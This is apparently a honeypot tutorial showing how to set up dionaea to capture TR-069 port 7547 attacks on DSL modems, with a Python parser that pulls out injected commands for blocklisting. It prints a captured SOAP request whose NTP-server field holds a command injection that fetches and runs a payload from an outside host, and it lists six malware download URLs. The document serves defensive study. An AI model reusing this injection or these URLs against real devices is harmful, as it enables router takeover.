Use dionaea to capture attacks against TR-069

In recent days attacks against port 7547 have increased. You can capture some of this traffic with your dionaea honeypot.

Since dionaea version 0.6 a new service called blackhole is available in dionaea. This service can simulate a very basic service and collect data submitted to the honeypot. To enable the service get dionaea version 0.6 or later and edit or create a config file in the services-enabled directory with the following content.

- name: blackhole
  config:
    services:
      # TR-069
      - port: 7547
        protocol: tcp

Restart dionaea and it will start to listen on tcp port 7547. At the time of writing you should see the first attacks within a very short period of time.

In the example below you can see the data captured by dionaea a few seconds after the restart. The XML data has been reformatted to be more readable.

POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
                   SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <SOAP-ENV:Body>
        <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
            <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>
            <NewNTPServer2></NewNTPServer2>
            <NewNTPServer3></NewNTPServer3>
            <NewNTPServer4></NewNTPServer4>
            <NewNTPServer5></NewNTPServer5>
        </u:SetNTPServers>
    </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

I was able to capture 6 different addresses within a few minutes.

  • http://tr069.pw/1
  • http://tr069.pw/2
  • http://srrys.pw/1
  • http://srrys.pw/2
  • http://l.ocalhost.host/1
  • http://l.ocalhost.host/2
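To turn captures like the one above into a list of download URLs, the request has to be split into headers and SOAP body, the NewNTPServerN values extracted, and any backtick command injection inspected. The script below is an added example and is not part of dionaea or of the original post; it reproduces the captured request above (with CRLF line endings, as a TCP capture would have them) and a constructed benign SetNTPServers request for contrast. The backtick and URL regular expressions are assumptions about what the attacker traffic looks like, not something dionaea provides.

```python
import re
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
TIME_NS = "urn:dslforum-org:service:Time:1"

# Constructed sample: the request captured above, with CRLF line endings.
SAMPLE_REQUEST = (
    "POST /UD/act?1 HTTP/1.1\r\n"
    "Host: 127.0.0.1:7547\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    "SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\n"
    "Content-Type: text/xml\r\n"
    "Content-Length: 526\r\n"
    "\r\n"
    '<?xml version="1.0"?>'
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
    'SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
    "<SOAP-ENV:Body>"
    '<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">'
    "<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>"
    "<NewNTPServer2></NewNTPServer2>"
    "<NewNTPServer3></NewNTPServer3>"
    "<NewNTPServer4></NewNTPServer4>"
    "<NewNTPServer5></NewNTPServer5>"
    "</u:SetNTPServers>"
    "</SOAP-ENV:Body>"
    "</SOAP-ENV:Envelope>"
)

# Constructed benign request: a legitimate NTP server name, no injection.
BENIGN_REQUEST = (
    "POST /UD/act?1 HTTP/1.1\r\n"
    "Host: 127.0.0.1:7547\r\n"
    "SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\n"
    "Content-Type: text/xml\r\n"
    "\r\n"
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
    "<SOAP-ENV:Body>"
    '<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">'
    "<NewNTPServer1>pool.ntp.org</NewNTPServer1>"
    "</u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>"
)

# Heuristics (assumptions): shell command substitution in backticks, and
# URLs inside such a command up to the next separator.
BACKTICK_RE = re.compile(r"`([^`]*)`")
URL_RE = re.compile(r"https?://[^\s;'\"`]+")


def split_request(raw):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def ntp_server_values(body):
    """Return the text of every NewNTPServerN element in a SetNTPServers body."""
    root = ET.fromstring(body)
    values = []
    for call in root.iter("{%s}SetNTPServers" % TIME_NS):
        for child in call:
            # The NewNTPServerN elements carry no namespace in the capture.
            if child.tag.startswith("NewNTPServer"):
                values.append(child.text or "")
    return values


def analyse_request(raw):
    """Extract injected shell commands and the URLs they fetch from one request."""
    request_line, headers, body = split_request(raw)
    result = {
        "request_line": request_line,
        "soap_action": headers.get("soapaction", ""),
        "commands": [],
        "urls": [],
    }
    if "setntpservers" not in result["soap_action"].lower():
        return result
    for value in ntp_server_values(body):
        for cmd in BACKTICK_RE.findall(value):
            result["commands"].append(cmd)
            result["urls"].extend(URL_RE.findall(cmd))
    return result


if __name__ == "__main__":
    for sample in (SAMPLE_REQUEST, BENIGN_REQUEST):
        print(analyse_request(sample))
```

Run against the captured request the script reports one injected command and the URL http://l.ocalhost.host/2; the benign request yields no commands, so the URL list can be fed straight into a blocklist or further analysis without manual reading of each capture.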

Some requests don't contain a shell command, but they seem to have additional exploit code appended at the end.

The Internet Storm Center has collected some additional information about the Port 7547 SOAP Remote Code Execution Attack Against DSL Modems.
